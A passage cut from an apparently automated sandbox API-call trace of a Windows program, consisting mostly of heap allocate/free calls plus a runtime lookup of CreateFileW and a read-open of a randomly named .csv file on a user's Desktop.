hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0126.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0126.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0126.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0126.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0126.137] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0126.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0126.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0126.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0126.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0126.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0126.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0126.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0126.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0126.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0126.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0126.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0126.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0126.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0126.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0126.138] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0126.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0126.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0126.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0126.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0126.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0126.139] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0126.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0126.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0126.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0126.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0126.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caa18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0126.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0126.139] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0126.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0126.139] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0126.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0126.139] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0126.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0126.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0126.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0126.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0126.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0126.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0126.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0126.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0126.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0126.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0126.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0126.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0126.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0126.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0126.140] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0126.140] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uaY41mSq.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\uay41msq.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0126.140] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0126.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0126.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0126.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0126.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0126.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0126.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0126.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0126.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0126.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0126.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0126.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0126.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0126.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0126.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0126.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0126.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0126.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0126.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0126.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0126.141] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0126.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0126.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0126.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0126.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0126.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0126.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0126.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0126.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0126.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0126.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0126.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0126.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0126.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0126.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0126.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0126.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0126.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0126.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0126.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0126.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0126.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0126.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0126.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0126.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0126.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0126.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0126.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0126.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0126.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0126.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0126.143] FreeLibrary (hLibModule=0x772d0000) returned 1 [0126.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0126.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0126.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0126.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0126.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0126.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0126.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0126.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0126.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0126.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0126.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0126.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0126.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0126.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0126.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0126.145] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0126.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0126.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0126.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0126.145] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0126.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0126.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0126.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0126.145] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0126.146] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0126.146] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0126.147] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0126.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0126.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0126.149] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0126.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0126.149] HeapFree (in: 